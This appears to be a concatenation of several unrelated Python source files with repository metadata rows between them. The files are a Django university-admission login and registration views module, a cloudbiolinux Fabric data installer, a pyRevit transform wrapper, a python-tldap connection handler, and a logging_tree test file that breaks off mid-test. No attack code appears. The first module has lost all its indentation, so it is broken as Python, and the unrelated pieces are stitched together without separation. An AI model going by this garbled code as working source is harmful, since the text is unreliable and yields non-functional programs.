from application.forms import RegistrationForm, ActivationNameForm
from commons.email import send_password_by_email, send_activation_by_email
from commons.models import Announcement
from commons.decorators import within_submission_deadline
ALLOWED_LOGOUT_REDIRECTION = ['http://admission.eng.ku.ac.th']
def login(request):
announcements = Announcement.get_all_enabled_annoucements()
if not settings.LOGIN_ENABLED:
# login disabled
if request.method == 'POST':
return HttpResponseForbidden()
else:
return render_to_response('application/wait.html',
{ 'announcements': announcements })
error_messages = []
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
passwd = form.cleaned_data['password']
national_id = form.cleaned_data['national_id']
applicants = list(Applicant.objects.filter(national_id=national_id).all())
if len(applicants)!=0:
applicant = applicants[0]
else:
applicant = None
if applicant!=None:
if applicant.activation_required:
email = applicant.email
return render_to_response(
'application/registration/activation-required.html',
{ 'email': email })
elif applicant.check_password(passwd):
# authenticated
if not applicant.has_logged_in:
applicant.has_logged_in = True
applicant.save()
request.session['applicant_id'] = applicant.id
return redirect_to_applicant_first_page(applicant)
from django.forms.util import ErrorList
form._errors['password'] = ErrorList(['รหัสผ่านผิดพลาด'])
error_messages.append('รหัสผ่านผิดพลาด')
else:
form = LoginForm()
return render_to_response('application/start.html',
{ 'form': form,
'submission_deadline_passed':
submission_deadline_passed(),
'errors': error_messages,
'announcements': announcements })
def logout(request):
next_url = None
if 'url' in request.GET:
next_url = request.GET['url']
if next_url[0]!='/':
next_url = 'http://' + next_url
request.session.flush()
if next_url and (next_url in ALLOWED_LOGOUT_REDIRECTION):
return HttpResponseRedirect(next_url)
else:
return redirect_to_index(request)
def duplicate_email_error(applicant, email, first_name, last_name):
# query set is lazy, so we have to force it, using list().
old_registrations = list(applicant.registrations.all())
new_registration = Registration(applicant=applicant,
first_name=first_name,
last_name=last_name)
new_registration.random_and_save()
send_activation_by_email(applicant, new_registration.activation_key)
applicant.activation_required = True
applicant.save()
return render_to_response('application/registration/duplicate.html',
{ 'applicant': applicant,
'email': email,
'old_registrations': old_registrations,
'new_registration': new_registration,
'step_name': "อีเมล์นี้มีการลงทะเบียนไว้แล้ว ต้องมีการยืนยันอีเมล์" })
def validate_email_and_national_id(email, national_id):
applicant = Applicant.get_applicant_by_national_id(national_id)
if applicant!=None:
return (False, 'national_id', applicant)
else:
applicant = Applicant.get_applicant_by_email(email)
if applicant!=None:
return (False, 'email', applicant)
else:
return (True, None, None)
def registration_error(error_field,
applicant, email, national_id, first_name, last_name):
if error_field == 'email':
return duplicate_email_error(applicant,
email,
first_name,
last_name)
else:
return render_to_response(
'application/registration/duplicate-nat-id-error.html',
{ 'national_id': national_id,
'step_name': u'เกิดปัญหาในการลงทะเบียน เนื่องจากมีการใช้รหัสประจำตัวประชาชนซ้ำ'})
@within_submission_deadline
def register(request):
if request.method == 'POST':
if 'cancel' in request.POST:
return redirect_to_index(request)
form = RegistrationForm(request.POST)
if form.is_valid():
email = form.cleaned_data['email']
first_name=form.cleaned_data['first_name']
last_name=form.cleaned_data['last_name']
national_id=form.cleaned_data['national_id']
result, error_field, applicant = (
validate_email_and_national_id(email,
national_id))
if result:
try:
applicant = form.get_applicant()
passwd = applicant.random_password()
applicant.save()
except IntegrityError:
# somehow, it gets error
result, error_field, applicant = (
validate_email_and_national_id(email,
national_id))
return registration_error(error_field,
applicant,
email,
national_id,
first_name,
last_name)
registration = Registration(
applicant=applicant,
first_name=first_name,
last_name=last_name)
registration.random_and_save()
send_password_by_email(applicant, passwd)
return render_to_response(
'application/registration/success.html',
{'email': form.cleaned_data['email'],
'step_name': "การลงทะเบียนเรียบร้อย" })
else:
if not applicant.has_logged_in:
return registration_error(error_field,
applicant,
email,
national_id,
first_name,
last_name)
# e-mail or national id has been registered and logged in
from django.forms.util import ErrorList
from commons.utils import admin_email
if error_field == 'email':
dup_obj = u'อีเมล์'
else:
dup_obj = u'รหัสประจำตัวประชาชน'
form._errors['__all__'] = ErrorList([
u"""%(dup_obj)sนี้ถูกลงทะเบียนและถูกใช้แล้ว ถ้าอีเมล์นี้เป็นของคุณจริงและยังไม่เคยลงทะเบียน
กรุณาติดต่อผู้ดูแลระบบทางอีเมล์ <a href="mailto:%(email)s">%(email)s</a> หรือทางเว็บบอร์ด
อาจมีผู้ไม่ประสงค์ดีนำอีเมล์คุณไปใช้""" % {'dup_obj': dup_obj,
'email': admin_email()}])
else:
form = RegistrationForm()
return render_to_response('application/registration/register.html',
{ 'form': form })
@within_submission_deadline
def activate(request, activation_key):
try:
registration = Registration.objects.get(activation_key=activation_key)
except Registration.DoesNotExist:
return render_to_response(
'application/registration/activation-not-required.html',
{'step_name': "ไม่จำเป็นต้องมีการยืนยันอีเมล์"})
applicant = registration.applicant
if not applicant.activation_required:
return render_to_response(
'application/registration/activation-not-required.html',
{'step_name': "ไม่จำเป็นต้องมีการยืนยันอีเมล์"})
if not applicant.verify_activation_key(activation_key):
return render_to_response(
'application/registration/incorrect-activation-key.html',
{'applicant': applicant,
'step_name': "รหัสยืนยันผิดพลาด" })
if request.method == 'GET':
# get a click from e-mail
name_form = ActivationNameForm(initial={
'title': applicant.title,
'first_name': applicant.first_name,
'last_name': applicant.last_name})
else:
name_form = ActivationNameForm(request.POST)
if name_form.is_valid():
applicant.activation_required = False
applicant.title = name_form.cleaned_data['title']
applicant.first_name = name_form.cleaned_data['first_name']
applicant.last_name = name_form.cleaned_data['last_name']
passwd = applicant.random_password()
applicant.save()
registration = Registration(
applicant=applicant,
first_name=applicant.first_name,
last_name=applicant.last_name)
registration.random_and_save()
send_password_by_email(applicant, passwd)
return render_to_response(
'application/registration/activation-successful.html',
{'applicant': applicant})
return render_to_response(
'application/registration/activation-name-confirmation.html',
{'applicant': applicant,
'form': name_form,
'activation_key': activation_key,
'no_first_page_link': True,
'step_name': "การยืนยันอีเมล์ - รหัสสำหรับยืนยันถูกต้อง" })
def forget_password(request):
if request.method == 'POST':
form = ForgetPasswordForm(request.POST)
if form.is_valid():
email = form.cleaned_data['email']['email']
applicant = form.cleaned_data['email']['applicant']
if applicant.can_request_password():
if applicant.activation_required:
return duplicate_email_error(applicant,
email,
applicant.first_name,
applicant.last_name)
new_pwd = applicant.random_password()
applicant.save()
send_password_by_email(applicant, new_pwd)
return render_to_response(
'application/registration/password-sent.html',
{'email': email,
'step_name': "ส่งรหัสผ่านให้แล้ว"})
else:
return render_to_response(
'application/registration/too-many-requests.html',
{'email': email,
'step_name': "ขอรหัสผ่านบ่อยครั้งเกินไป"})
else:
form = ForgetPasswordForm()
return render_to_response('application/forget.html',
{ 'form': form })
| agpl-3.0 | -2,274,095,997,374,761,200 | 40.1 | 102 | 0.537064 | false |
chapmanb/cloudbiolinux | data_fabfile.py | 1 | 3179 | """Fabric deployment file to install genomic data on remote instances.
Designed to automatically download and manage biologically associated
data on cloud instances like Amazon EC2.
Fabric (http://docs.fabfile.org) manages automation of remote servers.
Usage:
fab -i key_file -H servername -f data_fabfile.py install_data
"""
import os
import sys
from fabric.main import load_settings
from fabric.api import *
from fabric.contrib.files import *
from fabric.context_managers import path
try:
import boto
except ImportError:
boto = None
# preferentially use local cloudbio directory
for to_remove in [p for p in sys.path if p.find("cloudbiolinux-") > 0]:
sys.path.remove(to_remove)
sys.path.append(os.path.dirname(__file__))
from cloudbio.utils import _setup_logging, _configure_fabric_environment
from cloudbio.biodata import genomes
# -- Host specific setup
env.remove_old_genomes = False
def setup_environment():
"""Setup environment with required data file locations.
"""
_setup_logging(env)
_add_defaults()
_configure_fabric_environment(env, ignore_distcheck=True)
def _add_defaults():
"""Defaults from fabricrc.txt file; loaded if not specified at commandline.
"""
env.config_dir = os.path.join(os.path.dirname(__file__), "config")
conf_file = "tool_data_table_conf.xml"
env.tool_data_table_conf_file = os.path.join(os.path.dirname(__file__),
"installed_files", conf_file)
if not env.has_key("distribution"):
config_file = os.path.join(env.config_dir, "fabricrc.txt")
if os.path.exists(config_file):
env.update(load_settings(config_file))
CONFIG_FILE = os.path.join(os.path.dirname(__file__), "config", "biodata.yaml")
def install_data(config_source=CONFIG_FILE):
"""Main entry point for installing useful biological data.
"""
setup_environment()
genomes.install_data(config_source)
def install_data_raw(config_source=CONFIG_FILE):
"""Installing useful biological data building from scratch. Useful for debugging.
"""
setup_environment()
genomes.install_data(config_source, approaches=["raw"])
def install_data_s3(config_source=CONFIG_FILE, do_setup_environment=True):
"""Install data using pre-existing genomes present on Amazon s3.
"""
setup_environment()
genomes.install_data_s3(config_source)
def install_data_rsync(config_source=CONFIG_FILE):
"""Install data using Galaxy rsync data servers.
"""
setup_environment()
genomes.install_data_rsync(config_source)
def install_data_ggd(recipe, organism):
"""Install data using Get Genomics Data (GGD) recipes.
"""
setup_environment()
from cloudbio.biodata import ggd, genomes
genome_dir = os.path.join(genomes._make_genome_dir(), organism)
recipe_file = os.path.join(os.path.dirname(__file__), "ggd-recipes", organism, "%s.yaml" % recipe)
ggd.install_recipe(genome_dir, env, recipe_file, organism)
def upload_s3(config_source=CONFIG_FILE):
"""Upload prepared genome files by identifier to Amazon s3 buckets.
"""
setup_environment()
genomes.upload_s3(config_source)
| mit | -2,308,734,205,961,331,700 | 33.182796 | 102 | 0.702108 | false |
eirannejad/pyRevit | pyrevitlib/rpw/db/transform.py | 1 | 1871 | """ Transform Wrappers """
import math
import rpw
from rpw import DB
from rpw.base import BaseObjectWrapper
class Transform(BaseObjectWrapper):
"""
`DB.Transform` Wrapper
Attributes:
_revit_object (DB.XYZ): Wrapped ``DB.Transform``
"""
_revit_object_class = DB.Transform
@classmethod
def rotate_vector(cls, vector, rotation, center=None, axis=None, radians=False):
""" Rotate a Vector or point
Usage:
>>> from rpw import db
>>> db.Transform.rotate_vector(SomeVector, 90.0)
Args:
vector (``point-like``): Point like element.
rotation (``float``): Rotation in degrees.
center (``point-like``, optional): Center of rotation [default: 0,0,0]
axis (``point-like``, optional): Axis of rotation [default: 0,0,1]
radians (``bool``, optional): True for rotation angle is in radians [default: False]
Returns:
``point-like``: Rotate Vector
"""
XYZ = rpw.db.XYZ
vector = XYZ(vector)
if radians:
angle_rad = rotation
else:
angle_rad = math.radians(rotation)
axis = XYZ(DB.XYZ(0,0,1)) if not axis else XYZ(axis)
center = XYZ(DB.XYZ(0,0,0)) if not center else XYZ(center)
transform = cls._revit_object_class.CreateRotationAtPoint(
axis.unwrap(),
angle_rad,
center.unwrap())
return XYZ(transform.OfVector(vector.unwrap()))
@classmethod
def move(cls, vector, object):
""" Rotate a Vector by Degrees """
raise NotImplemented
# vector = XYZ(vector)
# transform = cls._revit_object_class.CreateTranslation(vector)
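# Illustrative usage sketch (editor's addition): rotate a point-like value 90
# degrees around the world Z axis. This assumes a running Revit session with
# rpw available, so it is shown here as comments only.
# from rpw import db
# rotated = db.Transform.rotate_vector((1, 0, 0), 90.0, center=(0, 0, 0), axis=(0, 0, 1))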
| gpl-3.0 | -1,232,147,447,180,251,000 | 31.824561 | 96 | 0.544094 | false |
Karaage-Cluster/python-tldap | tldap/utils.py | 1 | 1651 | # Copyright 2012-2014 Brian May
#
# This file is part of python-tldap.
#
# python-tldap is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-tldap is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with python-tldap If not, see <http://www.gnu.org/licenses/>.
""" Contains ConnectionHandler which represents a list of connections. """
import sys
from threading import local
DEFAULT_LDAP_ALIAS = "default"
def load_backend(backend_name):
__import__(backend_name)
return sys.modules[backend_name]
class ConnectionHandler(object):
""" Contains a list of known LDAP connections. """
def __init__(self, databases):
self.databases = databases
self._connections = local()
def __getitem__(self, alias):
if hasattr(self._connections, alias):
return getattr(self._connections, alias)
db = self.databases[alias]
backend = load_backend(db['ENGINE'])
conn = backend.LDAPwrapper(db)
setattr(self._connections, alias, conn)
return conn
def __iter__(self):
return iter(self.databases)
def all(self):
""" Return list of all connections. """
return [self[alias] for alias in self]
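# Illustrative usage sketch (editor's addition): the settings dictionary below is
# an assumption about typical configuration keys, so it is shown as comments only.
# settings = {
#     'default': {
#         'ENGINE': 'tldap.backend.fake_transactions',
#         'URI': 'ldap://localhost',
#     },
# }
# connections = ConnectionHandler(settings)
# conn = connections['default']          # backend is imported and wrapped lazily
# all_connections = connections.all()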
| gpl-3.0 | -3,364,013,351,599,750,000 | 29.018182 | 74 | 0.688674 | false |
katsumin/HomeRpi | bp35c0_join2.py | 1 | 1963 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
sys.path.append("/home/pi/HomeRpi")
import serial
import time
import ConfigParser
iniFile = ConfigParser.SafeConfigParser()
iniFile.read('./config.ini')
args = sys.argv
# initialize the serial port
serialPortDev = iniFile.get('smartmeter', 'serial_port')
baudRate = iniFile.get('smartmeter', 'serial_bps')
ser = serial.Serial(serialPortDev, int(baudRate))
# helper function
def waitOk() :
while True :
line = ser.readline()
print(line, end="")
if line.startswith("OK") :
break
# send commands
while True :
ser.write("SKVER\r\n")
line = ser.readline()
if line.startswith("OK") :
break
#pwd = args[1]
pwd = iniFile.get('smartmeter', 'pwd')
ser.write("SKSETPWD C {0}\r\n".format(pwd))
waitOk()
#bid = args[2]
bid = iniFile.get('smartmeter', 'bid')
ser.write("SKSETRBID {0}\r\n".format(bid))
waitOk()
scanRes = {}
ser.write("SKSCAN 2 FFFFFFFF 6 0\r\n")
while True :
line = ser.readline()
print(line, end="")
if line.startswith("EVENT 22") :
break
elif line.startswith(" ") :
cols = line.strip().split(':')
scanRes[cols[0]] = cols[1]
ser.write("SKSREG S2 " + scanRes["Channel"] + "\r\n")
waitOk()
ser.write("SKSREG S3 " + scanRes["Pan ID"] + "\r\n")
waitOk()
ser.write("SKLL64 " + scanRes["Addr"] + "\r\n")
while True :
line = ser.readline()
print(line, end="")
if not line.startswith("SKLL64") :
ipv6Addr = line.strip()
break
print(ipv6Addr)
iniFile.set('smartmeter','address',ipv6Addr)
fp=open('./config.ini','w')
iniFile.write(fp)
fp.close()
#ipv6Addr = "FE80:0000:0000:0000:021C:6400:03CE:BD79"
command = "SKJOIN {0}\r\n".format(ipv6Addr)
ser.write(command)
while True:
line = ser.readline()
print(line, end="")
if line.startswith("EVENT 24") :
break
elif line.startswith("EVENT 25") :
break
| mit | -3,208,476,356,250,593,000 | 20.897727 | 56 | 0.622211 | false |
cmuphyscomp/hmv-s16 | Grasshopper/MocapDemo/optirecv.py | 1 | 7577 | # optirecv.py : motion capture data receiver for use within Grasshopper ghpython objects
# Copyright (c) 2016, Garth Zeglin. All rights reserved. Licensed under the
# terms of the BSD 3-clause license.
# use RhinoCommon API
import Rhino
# Make sure that the Python libraries that are also contained within this course
# package are on the load path. This adds the python/ folder to the load path
# *after* the current folder. The path manipulation assumes that this module is
# still located within the Grasshopper/MocapDemo subfolder, and so the package
# modules are at ../../python.
import sys, os
sys.path.insert(1, os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))), "python"))
# import the Optitrack stream decoder
import optirx
# import a quaternion conversion function
from optitrack.geometry import quaternion_to_xaxis_yaxis
# load the Grasshopper utility functions from the course packages
from ghutil import *
# share the mocap coordinate conversion code with the CSV loader
from optiload import rotated_point, rotated_orientation, plane_or_null
#================================================================
class OptitrackReceiver(object):
def __init__(self, version_string, ip_address=None):
# The version string should be of the form "2900" and should match the SDK version of the Motive software.
# E.g. Motive 1.9 == SDK 2.9.0.0 == "2900"
# Motive 1.8 == SDK 2.8.0.0 == "2800"
self.sdk_version = tuple(map(int,version_string)) # e.g. result is (2,9,0,0)
# create a multicast UDP receiver socket
self.receiver = optirx.mkdatasock(ip_address=ip_address)
# set non-blocking mode so the socket can be polled
self.receiver.setblocking(0)
# Keep track of the most recent results. These are stored as normal Python list structures, but
# already rotated into Rhino coordinate conventions.
self.positions = list() # list of Point3d objects
self.rotations = list() # list of [x,y,z,w] quaternions as Python list of numbers
self.bodynames = list() # list of name strings associated with the bodies
return
#================================================================
def make_plane_list(self):
"""Return the received rigid body frames as a list of Plane or None (for missing data), one entry per rigid body stream."""
# convert each quaternion into a pair of X,Y basis vectors
basis_vectors = [quaternion_to_xaxis_yaxis(rot) for rot in self.rotations]
# Extract the X and Y axis basis elements into lists of Vector3d objects.
xaxes = [Rhino.Geometry.Vector3d(*(basis[0])) for basis in basis_vectors]
yaxes = [Rhino.Geometry.Vector3d(*(basis[1])) for basis in basis_vectors]
# Generate either Plane or None for each coordinate frame.
planes = [plane_or_null(origin, x, y) for origin,x,y in zip(self.positions, xaxes, yaxes)]
return planes
#================================================================
def _markers_coincide(self, m1, m2):
"""For now, an exact match (could be fuzzy match)."""
return m1[0] == m2[0] and m1[1] == m2[1] and m1[2] == m2[2]
def _identify_rigid_bodies(self, sets, bodies):
"""Compare marker positions to associate a named marker set with a rigid body.
:param sets: dictionary of lists of marker coordinate triples
:param bodies: list of rigid bodies
:return: dictionary mapping body ID numbers to body name
Some of the relevant fields:
bodies[].markers is a list of marker coordinate triples
bodies[].id is an integer body identifier with the User Data field specified for the body in Motive
"""
# for now, do a simple direct comparison on a single marker on each body
mapping = dict()
for body in bodies:
marker1 = body.markers[0]
try:
for name,markerset in sets.items():
if name != 'all':
for marker in markerset:
if self._markers_coincide(marker1, marker):
mapping[body.id] = name
raise StopIteration
except StopIteration:
pass
return mapping
#================================================================
def poll(self):
"""Poll the mocap receiver port and return True if new data is available."""
try:
data = self.receiver.recv(optirx.MAX_PACKETSIZE)
except:
return False
packet = optirx.unpack(data, version=self.sdk_version)
if type(packet) is optirx.SenderData:
version = packet.natnet_version
print "NatNet version received:", version
elif type(packet) is optirx.FrameOfData:
nbodies = len(packet.rigid_bodies)
# print "Received frame data with %d rigid bodies." % nbodies
# print "Received FrameOfData with sets:", packet.sets
# There appears to be one marker set per rigid body plus 'all'.
# print "Received FrameOfData with names:", packet.sets.keys()
# print "First marker of first marker set:", packet.sets.values()[0][0]
# print "Received FrameOfData with rigid body IDs:", [body.id for body in packet.rigid_bodies]
# print "First marker of first rigid body:", packet.rigid_bodies[0].markers[0]
# print "First tracking flag of first rigid body:", packet.rigid_bodies[0].tracking_valid
# compare markers to associate the numbered rigid bodies with the named marker sets
mapping = self._identify_rigid_bodies( packet.sets, packet.rigid_bodies)
# print "Body identification:", mapping
if nbodies > 0:
# print packet.rigid_bodies[0]
# rotate the coordinates into Rhino conventions and save them in the object instance as Python lists
self.positions = [ rotated_point(body.position) if body.tracking_valid else None for body in packet.rigid_bodies]
self.rotations = [ rotated_orientation(body.orientation) for body in packet.rigid_bodies]
self.bodynames = [ mapping.get(body.id, '<Missing>') for body in packet.rigid_bodies]
# return a new data indication
return True
elif type(packet) is optirx.ModelDefs:
print "Received ModelDefs:", packet
else:
print "Received unhandled NatNet packet type:", packet
# else return a null result
return False
#================================================================
def frames_to_tree(frame_list):
"""Utility function to convert a list of list of Plane objects representing a trajectory segment into a GH data tree."""
# Transpose the frame list for output. As accumulated, it is a list of lists:
# [[body1_sample0, body2_sample0, body3_sample0, ...], [body1_sample1, body2_sample1, body3_sample1, ...], ...]
segment = zip(*frame_list)
# Convert a Python list-of-lists into a data tree. Segment is a list of trajectories:
# [[body1_sample0, body1_sample1, body1_sample2, ...], [body2_sample0, body2_sample1, body2_sample2, ...], ...]
return list_to_tree(segment)
#================================================================
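# Illustrative polling sketch (editor's addition): intended to run inside a
# Grasshopper ghpython component; the SDK version string and network setup are
# assumptions, so this is shown as comments only.
# receiver = OptitrackReceiver("2900")          # matches Motive 1.9 / NatNet SDK 2.9
# if receiver.poll():
#     planes = receiver.make_plane_list()       # one Plane (or None) per rigid body
#     tree = frames_to_tree([planes])           # single-sample trajectory as a data tree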
| bsd-3-clause | 5,983,820,118,657,110,000 | 46.955696 | 131 | 0.60776 | false |
KarlPineau/patrimeph | lookForErrors.py | 1 | 1377 | import re
import math
import json
import operator
from collections import Counter
import collections
import xml.etree.ElementTree as ET
import urllib.request
import urllib.parse
tree = ET.parse('workingDirectory/skos.rdf')
root = tree.getroot()
namespaces = {"skos": "http://www.w3.org/2004/02/skos/core#",
"xml": "http://www.w3.org/XML/1998/namespace",
"rdf": "http://www.w3.org/1999/02/22-rdf-syntax-ns#"}
arrayNamespace = []
arrayFalse = []
for preConcept in root.findall('.//skos:Concept', namespaces):
for preAttrib in preConcept.attrib:
arrayNamespace.append(preConcept.attrib[preAttrib])
for broader in root.findall('.//skos:broader', namespaces):
for attrib in broader.attrib:
if broader.attrib[attrib] not in arrayNamespace:
arrayFalse.append(" > broader > "+broader.attrib[attrib])
for narrower in root.findall('.//skos:narrower', namespaces):
for attrib in narrower.attrib:
if narrower.attrib[attrib] not in arrayNamespace:
arrayFalse.append(" > narrower > "+narrower.attrib[attrib])
for related in root.findall('.//skos:related', namespaces):
for attrib in related.attrib:
if related.attrib[attrib] not in arrayNamespace:
arrayFalse.append(" > related > "+related.attrib[attrib])
# print(arrayNamespace)
for error in arrayFalse:
print(error)
| mit | 9,186,682,194,282,567,000 | 32.585366 | 71 | 0.694989 | false |
sri13/nas_sor_code | implementSOR.py | 1 | 4374 | # -*- coding: utf-8 -*-
"""
"""
import numpy as np
def get_euclid_norm(matrix):
"""
this function accepts one vector
the calling function should compute this vector as the difference of two vectors
the standard Euclidean distance formula sqrt(x1^2+x2^2+....+xn^2) is applied
"""
sum = 0
for each_val in matrix:
sum+=each_val**2
return np.sqrt(sum)
def get_residual(A, x, b):
"""
return the residual error Ax-b for an approximation of x
input parameters should be numpy arrays
this is not as simple as using numpy.dot because A is in CSR format
"""
adotx = []
for i in range(0,len(b)):
adotx.append(0.0)
#i should really do a DOT function instead of coding it explicitly here and in SOR also
for j in range (0, len(b)):
first_nz = A[1][(A[2][j]-1)] - 1 #pos of first non zero on row
for k in range(A[2][j]-1, A[2][j+1]-1):
adotx[j] = adotx[j] + A[0][k] * x[k - (A[2][j]-1) + first_nz]
return get_euclid_norm(np.subtract(adotx, b))
def get_x_seq(xold, xnew):
"""
this function computes Euclidean distance between successive iterations of x
input parameters should be numpy arrays
"""
return get_euclid_norm(np.subtract(xnew, xold))
def chk_diverge(xold, xnew, A, b):
"""
check if previous approx of x was closer than new approx of x
"""
dist_old = get_residual(A, xold, b)
dist_new = get_residual(A, xnew, b)
if dist_old < dist_new:
return True
else:
return False
def chk_converge(A, xnew, b, xold, x_seq_tol, res_tol, flag):
#checks both residual and x_seq for convergence
if flag == True:
return -1 #required to enter sparse_sor loop
elif get_residual(A, xnew, b) < res_tol:
return 2 #dict value for this stopping reason
elif get_x_seq(xold, xnew) < x_seq_tol:
return 1
elif chk_diverge(xold, xnew, A, b) == True:
return 4
return -1
def sparse_sor(matrix_a, vector_b, matrix_x, dimension_n, max_it=50, \
x_tol=1e-13, res_tol=1e-13, w=1.25 ):
num_it = 1
stop_reason = 6 #something has gone wrong if this does not get overwritten later
matrix_x_last_it = np.array([0.0])
matrix_x_new = np.array(matrix_x)
matrix_a_np = np.array(matrix_a)
vector_b_np = np.array(vector_b)
flag = True #required to enter while loop first time only
while num_it <= max_it and \
chk_converge(matrix_a_np, matrix_x_new, vector_b_np, matrix_x_last_it,
x_tol, res_tol, flag) == -1:
flag = False
matrix_x_last_it = np.array(matrix_x_new[:])
for i in range(0,len(vector_b)):
sum = 0
first_nz = matrix_a_np[1][(matrix_a_np[2][i]-1)] - 1 #pos of first non zero on row
for j in range(matrix_a_np[2][i]-1, matrix_a_np[2][i+1]-1):
sum = sum + matrix_a_np[0][j] * matrix_x_new[j - \
(matrix_a_np[2][i]-1) + first_nz]
if matrix_a_np[1][j] == i+1:
d = matrix_a[0][j]
matrix_x_new[i] = matrix_x_new[i] + w * (vector_b_np[i] - sum) / d
num_it+=1
conv = chk_converge(matrix_a_np, matrix_x_new, vector_b_np, matrix_x_last_it, \
x_tol, res_tol, False)
if num_it-1 == max_it:
stop_reason = 3
elif conv != -1:
stop_reason = conv
# processIO.output(err.args[1], max_it, num_it, x_tol, res_tol, matrix_x, output_filename,err.args[0])
# set_output(stop_reason, max_it, num_it-1, x_tol, res_tol,matrix_x_new, )
return (stop_reason, max_it, num_it-1, matrix_x_new )
def dense_SOR(matrix_a,vector_b,dimension_n,max_iteration,w,matrix_x):
print("Dense SOR Calculation")
it_counter=0
while(it_counter<=max_iteration):
for row_counter in range(dimension_n):
sum=0.0
for col_counter in range(dimension_n):
sum = sum + matrix_a[row_counter,col_counter]*matrix_x[col_counter]
matrix_x[row_counter]=matrix_x[row_counter]+w*(vector_b[row_counter]-sum) \
/matrix_a[row_counter,row_counter]
# print("Iteration: ",it_counter,"\n","X:",matrix_x)
it_counter+=1
return
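# Illustrative usage sketch (editor's addition). The sparse matrix format used
# above is three parallel lists: non-zero values, their 1-based column indices,
# and 1-based row-start pointers (CSR-like). For A = [[4, 1], [1, 4]], b = [1, 1]:
# matrix_a = [[4.0, 1.0, 1.0, 4.0],   # non-zero values, row by row
#             [1, 2, 1, 2],           # 1-based column index of each value
#             [1, 3, 5]]              # 1-based start of each row (plus end sentinel)
# stop, max_it, n_it, x = sparse_sor(matrix_a, [1.0, 1.0], [0.0, 0.0], 2)
# # x converges towards [0.2, 0.2]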
| gpl-3.0 | -6,432,232,432,044,914,000 | 36.067797 | 116 | 0.568587 | false |
lebinh/ministat | setup.py | 1 | 2736 | # Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='ministat',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.0.2',
description='A mini statistics library for Python inspired by the `ministat` command',
long_description=long_description,
# The project's main homepage.
url='https://github.com/lebinh/ministat',
# Author details
author='Binh Le',
author_email='[email protected]',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
# What does your project relate to?
keywords='ministat statistic',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'dev': [],
'test': [],
},
) | mit | 5,320,854,888,845,466,000 | 33.2125 | 90 | 0.652778 | false |
FedericoCeratto/debian-python-logging-tree | logging_tree/tests/test_format.py | 1 | 5711 | """Tests for the `logging_tree.format` module."""
import logging
import logging.handlers
import unittest
import sys
from logging_tree.format import build_description, printout
from logging_tree.tests.case import LoggingTestCase
if sys.version_info >= (3,):
from io import StringIO
else:
from StringIO import StringIO
class FakeFile(StringIO):
def __init__(self, filename, mode, encoding=None):
self.filename = filename
StringIO.__init__(self)
def __repr__(self):
return '<file %r>' % self.filename
def fileno(self):
return 0
class FormatTests(LoggingTestCase):
def setUp(self):
# Prevent logging file handlers from trying to open real files.
# (The keyword delay=1, which defers any actual attempt to open
# a file, did not appear until Python 2.6.)
logging.open = FakeFile
super(FormatTests, self).setUp()
def tearDown(self):
del logging.open
super(FormatTests, self).tearDown()
def test_printout(self):
stdout, sys.stdout = sys.stdout, StringIO()
printout()
self.assertEqual(sys.stdout.getvalue(), '<--""\n Level WARNING\n')
sys.stdout = stdout
def test_simple_tree(self):
logging.getLogger('a')
logging.getLogger('a.b').setLevel(logging.DEBUG)
logging.getLogger('x.c')
self.assertEqual(build_description(), '''\
<--""
Level WARNING
|
o<--"a"
| Level NOTSET so inherits level WARNING
| |
| o<--"a.b"
| Level DEBUG
|
o<--[x]
|
o<--"x.c"
Level NOTSET so inherits level WARNING
''')
def test_fancy_tree(self):
logging.getLogger('').setLevel(logging.DEBUG)
log = logging.getLogger('db')
log.setLevel(logging.INFO)
log.propagate = False
log.disabled = 1
log.addFilter(MyFilter())
handler = logging.StreamHandler()
log.addHandler(handler)
handler.addFilter(logging.Filter('db.errors'))
logging.getLogger('db.errors')
logging.getLogger('db.stats')
log = logging.getLogger('www.status')
log.setLevel(logging.DEBUG)
log.addHandler(logging.FileHandler('/foo/log.txt'))
log.addHandler(MyHandler())
self.assertEqual(build_description(), '''\
<--""
Level DEBUG
|
o "db"
| Level INFO
| Propagate OFF
| Disabled
| Filter <MyFilter>
| Handler Stream %r
| Filter name='db.errors'
| |
| o<--"db.errors"
| | Level NOTSET so inherits level INFO
| |
| o<--"db.stats"
| Level NOTSET so inherits level INFO
|
o<--[www]
|
o<--"www.status"
Level DEBUG
Handler File '/foo/log.txt'
Handler <MyHandler>
''' % (sys.stderr,))
def test_most_handlers(self):
ah = logging.getLogger('').addHandler
ah(logging.handlers.RotatingFileHandler(
'/bar/one.txt', maxBytes=10000, backupCount=3))
ah(logging.handlers.SocketHandler('server.example.com', 514))
ah(logging.handlers.DatagramHandler('server.example.com', 1958))
